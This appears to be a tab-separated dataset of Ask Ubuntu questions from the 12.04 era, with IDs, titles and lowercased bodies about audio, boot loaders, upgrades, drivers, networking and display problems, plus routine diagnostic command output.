126507	volume slider only change the master volume , not pcm	pulseaudio 's default volume slider does n't work well with my audio card : when i change the volume ( through the volume icon or the keys on my keyboard ) , for the first 50 % the pcm volumes gets adjusted and for the next 50 % the master one . this change happens in big increments of ~20 % . the changes to pcm barely affects the volume level , while the master slides does . this makes the volume slider rather unusable : it 's either way too low , or too loud and i ca n't set it properly . is there a way , preferably through pulseaudio and not by rebinding my keys to use amixer ( as suggested in another post here ) to only change the master volume without ever touching pcm ? i know you can play around with the /usr/share/pulseaudio/alsa-mixer/paths/analog-output.conf.common file to achieve that effect , but this does not seem to be the proper way to change this : the change will get reverted next time pulseaudio gets updated .
126509	uncertainty involving installing grub and multiple hard drives	my desktop computer has multiple hard drives . here 's how they 're currently set up : note the windows 7 loader on the xp drive . my plan for 12.04 was to install it over my xp/wubi set up and dual boot just win7 and ubuntu . however , i 'm unsure about installing grub2 . is the windows 7 loader required for me to maintain a dual boot setup ? if i were to format sda and install grub there , would i have problems ? i ask because grub on my laptop does n't point to windows 7 on some partition but rather the windows 7 loader on some partition .
126514	what is the difference between upgrading from 11.10 and updating from 12.04 beta 2 ?	i have ubuntu 11.10 installed and ubuntu 12.04 beta also installed in the same machine . is there a difference between : upgrading from ubuntu 11.10 to ubuntu 12.04 and updating from ubuntu 12.04 beta to ubuntu 12.04 ? i have ubuntu 12.04 beta and ubuntu 11.10 installed .
126515	launcher on both screens after 12.04 update ( nvidia )	kind of hilarious , given this recent question , in which somebody asked if they could have the launcher on both screens , and the answer is `` 12.04 might help with that . '' i installed 12.04 , and now the launcher appears -- uninvited and unwanted -- on both of my screens . i was perfectly happy with the launcher on the left of the leftmost screens ! newbie , so i 've tried tinkering with my x settings , to no avail . any advice ?
126516	firefox upgrade breaks ctrl-w and ctrl-u keybindings	the ubuntu upgrade for firefox to version 12.0+build1-0ubuntu0.11.04.1 broke the ctrl+w and ctrl+u keybindings in all my edit controls . other people asking for `` emacs editor controls '' have found firemacs useful -- but firemacs does not provide a kill-word or kill-line field to bind with . customize shortcuts is often recommended as another approach , but it too does not provide kill-word or kill-line commands in its settings window . i 'm running natty ( 11.04 ) but i have a suspicion it has more to do with firefox than with the specific distribution . how do i get my ^w and ^u keybindings back ? update i have made a fresh install of precise ( 12.04 ) -- while keeping my home directory 's contents -- and firefox 12.0+build1-0ubuntu0.12.04.1 also demonstrates this problem .
126517	installed package curl and got a postfix error ! ? how do i fix postfix now ?	i have a couple questions related to the error below : why was postfix reconfigured when i installed curl ? is this normal ? what do i need to do to resolve the postfix error mentioned ? sudo apt-get install curl reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libcurl3 the following new packages will be installed : curl libcurl3 0 upgraded , 2 newly installed , 0 to remove and 7 not upgraded . 1 not fully installed or removed . need to get 403kb of archives . after this operation , 729kb of additional disk space will be used . do you want to continue [ y/n ] ? get:1 http : //us.archive.ubuntu.com hardy-updates/main libcurl3 7.18.0-1ubuntu2.3 [ 206kb ] get:2 http : //us.archive.ubuntu.com hardy-updates/main curl 7.18.0-1ubuntu2.3 [ 197kb ] fetched 403kb in 3s ( 102kb/s ) selecting previously deselected package libcurl3 . ( reading database ... 48741 files and directories currently installed . ) unpacking libcurl3 ( from ... /libcurl3_7.18.0-1ubuntu2.3_i386.deb ) ... selecting previously deselected package curl . unpacking curl ( from ... /curl_7.18.0-1ubuntu2.3_i386.deb ) ... setting up postfix ( 2.5.1-2ubuntu1.4 ) ... setting inet_protocols : all postfix is now set up with the changes above . if you need to make changes , edit /etc/postfix/main.cf ( and others ) as needed . to view postfix configuration values , see postconf ( 1 ) . after modifying main.cf , be sure to run '/etc/init.d/postfix reload ' . running newaliases postalias : fatal : open /etc/postfix/aliases.db : permission denied dpkg : error processing postfix ( -- configure ) : subprocess post-installation script returned error exit status 1 setting up libcurl3 ( 7.18.0-1ubuntu2.3 ) ... setting up curl ( 7.18.0-1ubuntu2.3 ) ... processing triggers for libc6 ... ldconfig deferred processing now taking place errors were encountered while processing : postfix e : sub-process /usr/bin/dpkg returned an error code ( 1 )
126518	ubuntu does not remember keyboard layout	iâm trying to set an alternate keyboard layout , but iâm having trouble doing so . i chose `` deutsch ( neo2 ) '' during installation of 12.04 , and this is the only layout i need . i have ubuntu on my laptop ( lenovo x121e ) , where the layout works fine , and on my desktop , where i also chose it during installation . but here , it changes back to american layout after reboot , although the layout dialog claims it to be `` deutsch ( neo2 ) '' . when i select it , it does changes to neo . however , all the shortcuts for unity stop working , e.g . alt+tab , or ctrl+alt+right to change workspace .
126525	how do i install windows 7 from an iso file on a separate partition from ubuntu ?	i have already installed ubuntu on my computer 's hard drive . but i want to create a second partition that runs windows 7 . my computer can not read dvd 's ( it 's that old ) so i have the windows 7 iso file on my desktop and a free 4gb usb that can be used to install it . i would also like to be able to boot into this separate windows partition .
126526	how can i personalize my macbook pro touchpad ?	i 'm running ubuntu 12.04 lts on a macbook pro 5.5 . i 'm just wondering if there is something that takes all the kinks out of the touch-pad . it works good , but it feels sluggish , double tap works about 75 % of the time and sometimes while i it somehow selects something on a different page ( although i 'm not sure if that has to deal with the touch-pad and not weird laptop bugs for a new lts ) if there are any programs , apps , commands aside from the built in system preferences > mouse and track-pad > touch-pad menu that allow someone to `` optimize '' touch-pad potential .
126528	it is possible to install drivers used on windows but working on ubuntu	there is n't drivers for video card on my computer or drivers for sis on ubuntu repositories and i know that it is poor supported or one of least supported , and i also have windows installed and on windows the drivers are installed and avaiable . can i use wine or playonlinux to install those drivers from windows so that i have the drivers installed on ubuntu ? is that possible ? i have ubuntu 12.04 beta so far and ubuntu 11.10 installed my video card is : 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 771/671 pcie vga display adapter ( rev 10 ) ) from a previous question that i asked how to use unity 3d and gnome shell without any drivers ?
126529	how to disable mce remote in ubuntu ?	i have an htpc ( running xbmcbuntu ) and a laptop running ubuntu 12.04 and i recently purchased an mce remote for my htpc which works great using lirc . i just noticed the remote is also controlling my laptop ! i 've been searching high and low trying to find out how to get this to stop but have had no luck . anyone have any ideas ?
126535	macbook pro 5.5 32-bit or 64-bit 12.04 lts	i 'm currently running ubuntu 12.04 lts 64-bit on a macbook pro 5.5 . i 'm dealing with a couple of issues with the backlight and other little pesky things which with my understanding could be caused by the silly mac , or just a brand new lts , or both . is it known for macs running ubuntu to run better with the 64-bit or 32-bit ? i know that the bit size deals with info transfer , but i 'm just curious if the versions react differently with the macs cpu and hardware ( for example if i switch to 32-bit would the backlight issue be resolved ) and resulting in a better user experience . = ) thanks in advance
126540	how to add a `` show desktop '' icon to the launcher ?	i recently upgraded from 10.04 to 12.04 , and there is no show desktop in the launcher . i know i can use ctrl+super+d , but is there a way to get it in the launcher ? edit : i just installed the `` show desktop '' icon on the launcher with myunity ( see below ) and it worked fine . it did not install the icon above dash launcher , but well below it . that bug has apparently been fixed . this is as of 2012.9.30 .
126541	how to manually install boot loader ?	my attempt to upgrade to 12.04 failed , so i burnt a 12.04 cd , and asked to do a full install , getting rid of all previous os ( i had windows as well as 11.10 ) . all seemed well until the very end when it said it had failed to install grub . i tried selecting different partitions to try in , with the same result . i can proceed without installing grub , but then it tells me i have to manually install the boot loader . a long google session has failed to come up with any instructions to do this that i can understand . help .
126545	i would like to make a virtual router on ubuntu 12.04	i have recently installed ubuntu 12.04 and would like to make a virtual router for my android device which only connects to infrastructure networks and not adhoc networks anyone who has any tips please help .
126548	keeping 12.04 server updated properly	i just installed a copy of 12.04 server and would like to know if i should use apt-get dist-upgrade to keep the server fully updated . apt-get update leaves the following behind ; linux-headers-server , linux-image-server & linux-server .
126552	how do i get my hp m1132 printer to work ?	i connected my printer to the computer and ubuntu 12.04recognized it and installed it , but when i try to print something , the printer just gives a signal as if the document had already been printed and nothing happens , and at the printing queue the job is still there as `` processing - not connected ? '' or `` stopped '' . the printer is working fine on microsoft windows and i am sure it is connected . in the status field in the printer properties , it says : processing - /usr/lib/cups/filter/hpcups failed . i 'd like someone to please teach me how to get this printer ( and it 's scanner ) working on ubuntu .
126556	is it possible to set the unity launcher to a nice solid color ?	http : //imageshack.us/photo/my-images/196/screenshotfrom201204280.png/ is it possible to get the unity launcher , dash , hud etc to use a nice solid color ? the best way would be to extend the panel theme all around the screen . this is not possible with myunity , there will always be some transparancy as far as i can tell from my trial and error .
126563	why do n't ctrl-alt-numpad6 and ctrl-alt-numpad4 work anymore ?	my favourite standard keyboard shortcut when using ubuntu 11.10 was ctrl+alt+numpad 4 and ctrl+alt+numpad 6 to push a window to the left or right half of the desktop - particularly useful when copying files from the desktop to somewhere on the filesystem using nautilus . i note the other numpad window controls seem to have been preserved but not the '6 ' or '4 ' sequences . if this is correct - can we have them back in a future patch or next release ?
126564	system boot results in `bootmgr missing` , `missing operating system` , `no bootable devices`	during an upgrade from 11.10 to 12.04 my computer suddenly froze . i restarted the computer and now it will not boot . i have seen various messages such as bootmgr missing , missing operating system , no bootable devices . i tried using boot repair but it did not help .
126571	how to do super w show open apps of all workspaces ?	note : a ppa is now available with a workaround until the bug is officially fixed in ubuntu 12.04.2 ( january 2013 ) . i am using precise pangolin and now , the comand key super w show only the apps from the current workspace . i like the old way , where i see the aplications of all workspaces . i'ts just me or its default now ? how to make the old way
126573	ethernet connectivity problems after upgrading to ubuntu 12.04lts	i tried upgrading once more to 12.04 after it went live . i had tried both beta 1 and beta 2 . the problem is that now i 'm getting sporadic network connectivity . my computer is hooked up straight to my modem/router combo -- it is hardwired , so wireless can be thrown out of the question . my other devices ( computers , phone , tablets , etc ) all are able to connect correctly and this is only happening with 12.04 . 11.10 works like a charm . output for ifconfig -a is as follows : link encap : ethernet hwaddr 00:1e:2a : b2:4f:28 inet addr:10.0.0.3 bcast:10.0.0.255 mask:255.255.255.0 inet6 addr : fe80 : :21e:2aff : feb2:4f28/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4093 errors:0 dropped:0 overruns:0 frame:0 tx packets:3531 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3767248 ( 3.7 mb ) tx bytes:555829 ( 555.8 kb ) interrupt:22 base address:0xec00 output for ethtool -s eth2 is as follows : nic statistics : tx_packets : 870 rx_packets : 854 tx_errors : 3 rx_errors : 1 rx_missed : 0 align_errors : 1385 tx_single_collisions : 0 tx_multi_collisions : 0 unicast : 683 broadcast : 57 multicast : 114 tx_aborted : 0 tx_underrun : 0 $ output for netstat -i is as follows : kernel interface table iface mtu met rx-ok rx-err rx-drp rx-ovr tx-ok tx-err tx-drp tx-ovr flg eth0 1500 0 0 0 0 0 0 0 0 0 bmu eth1 1500 0 0 0 0 0 0 0 0 0 bmu eth2 1500 0 854 0 0 0 870 0 0 0 bmru lo 16436 0 215 0 0 0 215 0 0 0 lru again , this is sporadic . it sometimes does n't do this on startup , and sometimes does . it will work fine for 10 mins or so , then not work for hours , then work for hours . i 'm not a network guy by any means so most of what i just posted is foreign to me - anyone have any suggestions as to what to check and what the rx-err and tx-err are ? thanks !
126579	full install that went well , wont boot , not even from my usb stick . really confused !	so i first installed it onto my usb stick . then checked things out with it , and decided to do a full install ( replacing windows 7 ) which went well . it says to restart , which i do . but when its booting back up , it gets stuck on a black screen with a tiny little bar in the top left corner . ive tried getting it to boot several times now , like changing the boot order and trying it back with my usb stick , but they all end with the black screen . os recovery is not an obtion . my laptop is a hp pavilion dm1 .
126584	ubuntu 12.04 log in troubles	i had was upgrading my ubuntu 11.10 to the new 12.04 and i had to force my computer off for it froze , thinking i had to start over the upgrade witch is fine with me , but apparently it some how finished upgrading , but now i ca n't log in . there is a black , terminal like screen asking for an `` ubuntu username '' and `` password '' , i keep putting my computer name and password in different way , wanting get on back to my art works i worked so hard on , but it keeps saying it 's invalid . i do n't want to restart my artworks i worked days on , i ca n't do anything twice , it 's to stressful and i need my art bad , i get very lonely , irritated and superstitious , sort of my safe zone . how can i get on the new ubuntu with out losing my stuff ? i 'd really appreciate it very much . ( note my laptop do n't use f # keys )
126588	ca n't access our buffalo network attached storage device	i get a box asking for the user name and password , which i correctly supply , but it wo n't accept them . i just verified that the user name and password work on an old 10.04 machine .
126592	webcamera and microphone not working after upgrade from 10.04 , microsoft vx-1000	i have also tried env ld_preload=/usr/lib/libv4l/v4l1compat.so skype skype recognizes the camera , but when i press test , only a black screen . cheese is working fine , the microphone is listed to be input in the sound settings , but no response . everything worked on 10.04 , it seems like it 's not supported yet ?
126595	where to obtain ubuntu supplied third-party device drivers patches to apply them to vanilla kernels ?	for testing purposes i usually download the ubuntu kernel available from git and build it for my pc . but usually the stable version of ubuntu kernel is not always in sync with the latest stable vanilla kernel . the difference also is that there are some patches applied to the vanilla kernel that are tailored to the ubuntu distribution . you can distinguish an ubuntu kernel if you look to the source folder where you will see 3 extra folders : debian debian.master ubuntu the packaging patches ( debian patches ) are available from the mainline kernel ppa ( eg for v3.3.3 vanilla kernel are here ) . the problem is that i can not find also the ubuntu supplied third-party device driver patch so that i can apply them to the latest stable kernel from kernel.org am i missing something ? should n't be a separated patch that can be downloaded and applied to the vanilla kernel so that it can be `` ubuntu'fied ''
126602	going from windows to 12.04lts , `` lzma data corrupt '' and `` kernel panic- not syncing vfs ''	after trying and failing several times to install windows xp from a usb , i decided to give ubuntu 12.04lts a whirl . note : the computer has a window installation at the moment , but it is stuck in a boot cycle . so , when i boot from usb , it appears to be smooth sailing through calm seas , the menu comes up as normal . but , after trying to run or install it , the process just stops after a while . the only things i can make out that would be errors are `` lzma data corrupt '' and `` kernel panic ; syncing vfs ; unable to mount root fs on unknown-block ( 0,0 ) . i have verified the md5 shecksum for my iso , and it came out as normal . i 've no idea what to do to remedy the problem . i have no other computers running linux , if it matters . all other similar questions were regarding upgrading from another version of linux .
126603	best vpn package for a group of 8 people doing majority online gaming	i 'd like to host a private vpn for online gaming purpose ? what will be the best suitable solution ? i 've heard of pptpd and openvpn , also know that windows could not connect to openvpn using its built in vpn client despite of its security benefits . my another concern is in terms of speed , which package would transmit data faster ( even a little faster ) ? thanks for kindly help .
126604	is it possible to modify the wubi installer for other distros ?	i 'm interested in trying out other distros but i for various reasons , i 'm not allowed to actually install them with all the partitioning and such . ubuntu 's wubi installs various ubuntu derivatives . there 's an installer for linux mint call mint4win and it 's very similar . i 'm wondering if it 's possible to modify the wubi program to install other distros and how would i be able to do this ? even if it installs only derivatives , that 's better than nothing . thanks
126605	11.10 to 12.04 : post-upgrade boot failure	when booting after upgrading to 12.04 from 11.10 , it stalls with the ubuntu logo and the dots going . pressing an f # key opens a log where there are repeated `` -tion manager '' / `` [ fail ] '' entries . the screen cuts off the first part of `` -tion '' . it stays like this for a long time and will not boot .
126606	guest access only	i did a clean install '12.04_amd64 3 times with the same results each time . installation went without problems , i did all my updates , installed aptitude , synaptic , changed server locale , started adding multimedia apps when everything went blank and logged out . no error messages . login screen only allows guest access . i reinstalled 11.10_amd64-no problems now . second and third install gave same results . the only root access is by tty . this is the most unusable version i 've had in the 6 years i 've been using ubuntu . asus p7p55d-e mainboard intel i5-750 processor western digital 1 tb . caviar 'black ' hdd old wd 160 gb . hdd 8gb 1600 'ripjaws ' memory nvidia 9800gt gpu triple boot : ubuntu 12.04_amd64 , windows 7 professional , windows xp professional-precise and win 7 shared 1tb hdd , xp on 160 gb . i found this message on /var/log/lightdm/lightdm.log : session 1839 : sending sigterm session 1839 : exited with return value 0 greeter quit
126608	unable to connect to wireless internet on an acer iconia w500 with an atheros ar9285	i 'm using an acer iconia w500 , and immediately after upgrading from 11.10 to 12.04 , it is unable to access the internet . it was able to access the internet just fine before the upgrade . it seems to be connecting to the wi-fi network , but i 've tried several different websites on several different browsers and none of them can display any pages . i am able to access the internet just fine through the exact same wi-fi connection on my toshiba satellite running linux mint . here are the results from sudo lspci -v : 01:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) subsystem : foxconn international , inc. device e031 flags : bus master , fast devsel , latency 0 , irq 17 memory at 90000000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 60 ] express legacy endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 160 ] device serial number 00-15-17-ff-ff-24-14-12 capabilities : [ 170 ] power budgeting < ? > kernel driver in use : ath9k kernel modules : ath9k
126609	need a unity indicator for gnome phone manager	i really want to use gnome phone manager on unity , but it 's icon is not appearing at the top panel , like in gnome . so i can not use the app . pls help !
126614	ubuntu 12.04 grub error while changing default os	i would like report a problem which i faced after installing ubuntu 12.04 64 bit http : //www.upubuntu.com/2011/11/how-to-change-default-os-at-boot-for.html after following the instruction when i ran update-grub it asked me whether to generate menu.lst which is used older grub versions i told yes ..and the default os option still remained as the same . output of update-grub when i run is as follows sudo update-grub searching for grub installation directory ... found : /boot/grub searching for default file ... found : /boot/grub/default testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst searching for splash image ... none found , skipping ... found kernel : /vmlinuz-3.2.0-23-generic found grub 2 : /boot/grub/core.img found kernel : /memtest86+.bin updating /boot/grub/menu.lst ... done
126616	unable to save images by dragging and dropping them from browser to nautilus or desktop	in chrome on windows i usually save images by dragging them from the browser to the folder i want to save them to . i prefer this method compared to navigating through the file browser as it is much faster . when i do the same in ubuntu it saves a link to the image instead of the actual image . is there any way to change this behavior ?
126617	ca n't load 12.04 from cd	i 've got 32bit version of 11.10 and i want to upgrade to 64bit 12.04 . i 've tried booting the iso from a usb and a cd but when i chose the boot option it just goes straight through to my normal desktop . i upgraded to 32bit 12.04 with update manager with little fuss . also , i tried to boot 64 bit version of 11.10 and was then just going to upgrade through update manager but it 's the same thing . even with 12.04 32bit . any help , greatly appreciated , but please talk slowly because i 'm quite stupid ... regards brad
126622	how to add right click menu item to create a launcher in gnome 3	when i create desktop icon launchers i need to use an extensive workaround . using `` dconf editor '' is a workaround to enable launchers on desktop . in dconf editor go to org > desktop > background then enable `` show desktop icons '' option . then create an empty file and name it , but with .desktop as an extension . example : gedit.desktop [ desktop entry ] encoding=utf-8 name=gedit exec=/usr/bin/gedit type=application icon=/usr/share/icons/gnome/256x256/apps/accessories-text-editor.png then save and right-click on the launcher to allow execution . that is currently how i make launchers . but is there a simpler way to make a launcher ... is there a way to make a right click menu item that will create or add a launcher to the desktop ?
126625	libgcc_s.so.1 must be installed for pthread_cancel to work	i upgraded to ubuntu 12.04 today and when i was about to login to my ftp ( which is running vsftpd ) i got an error : libgcc_s.so.1 must be installed for pthread_cancel to work i have upgraded and updated everything i can find . do n't know whats wrong ... here is someone else with the same error : http : //ubuntuforums.org/showthread.php ? t=1937131 no one ? ! really need some help : (
126626	poor xorg intel gm45 performance after 12.04 upgrade	just upgraded to 12.04 and my video performance feels a lot worse . running an intel gm45 with dual 1280x1900 screens . when i switch to a single screen performance is much better . this was the same setup on my 11.10 system , and was fine with the dual screens . glxgears is running around 30fps with dual screens on , and 60fps ( vsync limted ? ) with a single screen . looking for some ideas , or anyone else with the same issues .
126628	trying to go from edubuntu to ubuntu	recently upgraded to 12.04 however the problem started before that . i hoped that upgrading would solve the problem i created . granted , i 'm not sure how i created the problem . : - ) some time ago i downloaded edubuntu from ubuntu 's software center . my plan was not to replace ubuntu 's desktop , however that is what happened . all was good and then i upgraded ( from a version before 11.10 if i remember correctly ) and edubuntu was here to stay . what bothers me is that edubuntu does n't seem to have all of the options that ubuntu has/had . after reading ( either not enough or the wrong stuff ) , here is what i did to fix the problem : http : //i.stack.imgur.com/jcqnu.png after logging out i got the log in page ( is that the right word ? ) . it has edubuntu ( then the edubuntu logo ) 12.04 to the lower left . it gave me the following 4 options to log in ( i tried all 4 ) . recovery console - this made me think that i really messed things up . ubuntu ubuntu 2d - not sure how that differs from the above ( number 2 ) ubuntu . user defined session - that also scared me . somehow i remembered ctrl-alt-delete or i 'll still be stuck in there . now my desktop looks like this : http : //i.stack.imgur.com/gjbfg.png this could mean that this is a ubuntu desktop that only shows the edubuntu icon . however , i remember that i used to be able to do more in ubuntu . e.g. , i was able to give folders little icons . i forgot what the icons were called . i hope this is easy to understand . if not , please post what is not clear and i 'll try to clarify if i can . also , when posting ( and i hope you do ) , please assume that i do n't know much about computers ( as if this post does n't point that out : - ) .
126631	why do i get disk i/o errors booting the 3.2 kernel on a xen vps server ?	i have a xen vps , which i just upgraded to the new lts 12 precise pangolin . however , i see this error on booting : [ 12.848076 ] end_request : i/o error , dev xvda , sector 12841 [ 12.848093 ] end_request : i/o error , dev xvda , sector 12841 [ 12.848103 ] buffer i/o error on device xvda1 , logical block 1605 [ 12.848110 ] lost page write due to i/o error on xvda1 [ 12.848129 ] aborting journal on device xvda1 . results in / being mounted read-only . reboot : [ 3.087257 ] ext3-fs ( xvda1 ) : warning : ext3_clear_journal_err : marking fs in need of filesystem check . [ 3.087677 ] ext3-fs ( xvda1 ) : recovery complete [ 3.088514 ] ext3-fs ( xvda1 ) : mounted filesystem with ordered data mode begin : running /scripts/local-bottom ... done . done . begin : running /scripts/init-bottom ... done . fsck from util-linux 2.20.1 prgmrdisk1 contains a file system with errors , check forced . checking disk drives for errors . this may take several minutes . press c to cancel all checks in progress prgmrdisk1 : ***** reboot linux ***** prgmrdisk1 : 371152/6001184 files ( 2.8 % non-contiguous ) , 4727949/12000000 blocks mountall : fsck / [ 308 ] terminated with status 3 mountall : system must be rebooted : / [ 151.566949 ] restarting system . name id mem vcpus state time ( s ) shadowmint 236 2048 1 -- p -- - 0.0 reboot - > back to 1 . this is definitely an issue with the 3.2 kernel , because booting the 3.0.0 or 2.6.38 kernel series make this issue magically disappear . i 'm certain this is some kind of weird xen thing , but no idea . anyone ? anyhow , until this is resolve i strongly recommend against upgrading if you 're running a xen server .
126632	my install of 10.04 does not show that there is an lts upgrade available , what do i do ?	this is an install on an older machine i have for my grandmother . i installed 10.04 quite some time ago and would now like to upgrade her to something newer , but for some reason , even after checking , rechecking , and checking again , there is no upgrade to 12.04 button available in update manager . and i really do n't want to do a clean install , as i do n't want to lose all of her settings and documents . so any help ?
126634	unable to sign into 11.10 user	i upgraded to 12.04 today from 11.10 from a bootable thumbdrive . the upgrade took approximately 8 hours . i had to make a new user , and i 'm unable to sign into my user that i used in 11.10 . i can see my files in the /home/ directory , but there is n't an option to sign into that user on the boot screen . i am also unable to use the normal `` ubuntu '' setting , i get a black screen with that . i have to use `` ubuntu 2d '' . please help .
126640	unable to boot up from new ubuntu install	hi i have recently installed ubuntu on my usb hdd which had 3 partitions on it , 1 of them having ubuntu on it . i have been trying to boot up from it but it doesnt let me , i have installed the 12.04lts on it . thanks in advance , any help would be greatly appriciated -goeagles5
126649	window manager not loading when gnome-classic starts	when i boot up or log into gnome-classic ( no effects ) , windows do n't have the frame around them that has the minimize and close buttons and all that . after that , there all sorts of issues - for example , when i open a new window , it 's in the very top left corner , obscuring the menu on the gnome panel ... just a whole bunch of minor annoyances . i can get things working by by loading the compiz fusion icon and then selecting to reload the window manager . of course this is less than ideal . how do i get the window manager to load automatically ? update : it seems that i get no window manager whenever i load compiz , even after logging in . so it looks like the problem is more generally with compiz 's window manager .
126652	how to resolve `` release command failed '' in quickly app hello-world ?	i am new to ubuntu and new to programming . i watched the video on http : //developer.ubuntu.com/get-started/ and the video made it look so easy . i followed all the steps and everything was going good until i tried to release the app as demonstrated in the video . i am sure that i am not the only person to get this error . please tell me how to fix the error . here is the error i received . ( i have removed my name and e-mail address from the error message . ) user @ ubuntu : ~/hello-world $ quickly release get launchpad settings launchpad connection is ok ... ... ... ..ubuntu packaging created in debian/ ... ... ... pushing to launchpad ... ... ... ... ... ... you need a passphrase to unlock the secret key for user : `` user `` 2048-bit rsa key , id f89e77c4 , created 2012-04-27 ... ... you need a passphrase to unlock the secret key for user : `` user `` 2048-bit rsa key , id f89e77c4 , created 2012-04-27 ... ... checking signature on .changes gpg : signature made fri 27 apr 2012 10:24:56 pm edt using rsa key id f89e77c4 gpg : good signature from `` user `` good signature on ../hello-world_12.04.9_source.changes . checking signature on .dsc gpg : signature made fri 27 apr 2012 10:24:55 pm edt using rsa key id f89e77c4 gpg : good signature from `` user `` good signature on ../hello-world_12.04.9.dsc . uploading to ppa ( via ftp to ppa.launchpad.net ) : uploading hello-world_12.04.9.dsc : done . uploading hello-world_12.04.9.tar.gz : done . uploading hello-world_12.04.9_source.changes : done . successfully uploaded packages . traceback ( most recent call last ) : file `` /usr/share/quickly/templates/ubuntu-application/release.py '' , line 287 , in release_version ) , changelog ) file `` /usr/share/quickly/templates/ubuntu-application/internal/launchpad_helper.py '' , line 57 , in push_tarball_to_launchpad release = create_release ( project , version ) file `` /usr/share/quickly/templates/ubuntu-application/internal/launchpad_helper.py '' , line 44 , in create_release date_targeted=release_date ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/resource.py '' , line 573 , in call url , in_representation , http_method , extra_headers=extra_headers ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/_browser.py '' , line 281 , in _request raise error lazr.restfulclient.errors.unauthorized : http error 401 : unauthorized response headers : -content-encoding : gzip content-length : 65 content-type : text/plain date : sat , 28 apr 2012 02:25:01 gmt server : zope.server.http ( http ) status : 401 strict-transport-security : max-age=2592000 vary : accept , accept-encoding via : 1.1 api.launchpad.net x-content-type-options : nosniff x-frame-options : sameorigin x-lazr-notifications : [ ] x-powered-by : zope ( www.zope.org ) , python ( www.python.org ) x-xss-protection : 1 ; mode=block response body : ( , 'newmilestone ' , 'launchpad.edit ' ) error : release command failed aborting
126660	screen messed up when resumes from suspend	when ubuntu resumes from suspend the screen messed up ! , i have installed correct drivers for the graphics card ( nvidia geforce 6200 128mb agp ) and updated to the latest . this also happens when switching user accounts without login off , i use ubuntu 12.04 32 bit and my pc is intel p4 3.06ghz ht 1mb cache lga,1gb ddr1 400mhz , asus p5pe-vm mb , here are some screenshots . please help
126664	why to choose low latency kernel over generic or realtime ones ?	after installing ubuntu studio 12.04 , i found that it uses a low latency kernel . i searched why and how to change back to realtime or generic ones . but , looks like this part of linux has n't been covered so much . q : why to choose low latency kernel over generic or realtime ones ? p.s : l i have already read the answers from this question and this post .
126668	how to resolve home partition tied to older ubuntu version ?	i reinstalled precise , over the existing oneiric install and assigned the partitions manually . i have 3 partitions dedicated to ubuntu . the '/ ' partition i set to format . the '/boot ' partition also i formatted . to retain the home partition with precise , i assigned it as '/home ' . two problems have surfaced - 1 . the /home partition has been identified correctly by precise , but none of my data was carried over , despite my not formatting the partition . 2 . in my grub list on boot , an extra entry now occurs - ubuntu 11.10 ( 11.10 ) on /dev/sda9 could you tell me why this could have happened . and how to rectify it ? i guess the data 's gone , but how to resolve the partition still being linked with oneiric . thanks ! outputs for sudo blkid /dev/sda7 : uuid= '' a9c7641a-7579-42a6-90c1-330cffc06e42 '' type= '' ext2 '' /dev/sda8 : uuid= '' ef7ace89-9cfb-4ecc-8a86-654b3f926bbe '' type= '' swap '' /dev/sda9 : uuid= '' 8d8b94a9-5dd7-42f9-b91e-f4d4de3aa0c8 '' type= '' ext4 '' /dev/sda10 : uuid= '' de2f4e35-3e40-495b-bff2-091308b08cb6 '' type= '' ext4 '' sudo cat /etc/fstab < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 / was on /dev/sda10 during installation uuid=de2f4e35-3e40-495b-bff2-091308b08cb6 / ext4 errors=remount-ro 0 1 /boot was on /dev/sda7 during installation uuid=a9c7641a-7579-42a6-90c1-330cffc06e42 /boot ext2 defaults 0 2 /home was on /dev/sda9 during installation uuid=8d8b94a9-5dd7-42f9-b91e-f4d4de3aa0c8 /home ext4 defaults 0 2 swap was on /dev/sda8 during installation uuid=ef7ace89-9cfb-4ecc-8a86-654b3f926bbe none swap sw 0 0 sudo update-grub found linux image : /boot/vmlinuz-3.2.0-24-generic-pae found initrd image : /boot/initrd.img-3.2.0-24-generic-pae found linux image : /boot/vmlinuz-3.2.0-23-generic-pae found initrd image : /boot/initrd.img-3.2.0-23-generic-pae found memtest86+ image : /memtest86+.bin found windows 7 ( loader ) on /dev/sda1 found ubuntu 11.10 ( 11.10 ) on /dev/sda9
126669	best video cards for 3 monitors ?	i am looking to purchase a new video card and i want to run three lcds side-by-side . i normally would buy nvidia , but from what i have read , ati is the leader in multi-monitor with their eyefinity technology . my hardware my motherboard is a asrock p67 extreme4 gen3 . the dell ultrasharp u2412m monitors i 'm looking to buy have dvi , displayport , but no hdmi . my current video card is a geforce 8800 gts . it has 2 dvi ports . it would be nice to just add a second card , but i 'm willing to replace it entirely . my software currently running ubuntu 11.10 amd64 , but i will probably install 12.04 soon . i 'm running gnome 3 , but i 'd be willing to switch to unity to make this work . requirements i play games , so 3d acceleration must work . i may be okay with 3d acceleration only working on a single monitor . the video card ( s ) must be able to push 1920x1200 across 3 screens . i need a large , continuous desktop . i need to be able to drag windows between all three screens . what video card , or pair of cards , will support three monitors in ubuntu ? i 'm willing to edit xorg.conf ( and i 've been around long enough to remember when you had to hand-edit it ) . if i have to patch and/or compile some package , it 's not a deal-breaker .
126673	black line across top of display in virtualbox guest	as you can see from the screen shot below , there is a display problem in my virtualbox guest running on an ubuntu 12.04 64-bit host , using dual monitors . the line does not appear on the monitor the mouse pointer is on , only the other one . i am running the latest virtualbox ( 4.1.14 ) with guestadditions installed . any suggestions for how to resolve this ?
